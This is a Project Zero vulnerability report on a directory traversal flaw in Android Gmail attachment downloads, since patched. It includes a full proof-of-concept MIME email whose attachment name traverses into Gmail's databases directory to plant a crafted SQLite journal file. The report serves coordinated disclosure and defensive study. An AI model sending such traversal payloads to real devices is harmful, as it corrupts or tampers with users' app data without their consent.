1342 - Android Gmail: Directory Traversal in Attachment Download - project-zero

Starred by 2 users

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Nov 28
Cc:	project-...@google.com
Finder-natashenka Deadline-90 Vendor-Google CCProjectZeroMembers Severity-High Product-AndroidGmail Methodology-Code-Review Reported-2017-Aug-24

Android Gmail: Directory Traversal in Attachment Download

Project Member Reported by natashenka@google.com, Aug 24

Back to list

There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:

1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo)  account
2) the file can not overwrite an existing file, it has to be a file that doesn't already exist
3) there user has to click to download the attachment (and the path looks a bit weird on the screen)

It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory.

Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again

Content-Type: multipart/mixed; boundary="---
-714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello
To: <address>
From: natashenka@google.com

You will not see this in a MIME-aware mail reader.

------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html

<html><body><b>test</b></body></html>

------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="test"

2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=

------714A286D976BF3E58D9D671E37CBCF7C

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

traversal.py
2.1 KB View Download

Project Member Comment 1 by natashenka@google.com, Nov 28

Labels: -Restrict-View-Commit
Status: Fixed

This has been fixed, and the Gmail team included this response:

"We'd like to thank Project Zero for the coordinated disclosure of this security vulnerability. The Android Gmail app has been patched as of the latest version released through the Google Play Store on November 22, 2017 (version 7.11.5.176568039). Users have been automatically updated through the Google Play Store. We have no reports of any exploitation of this issue."

► Sign in to add a comment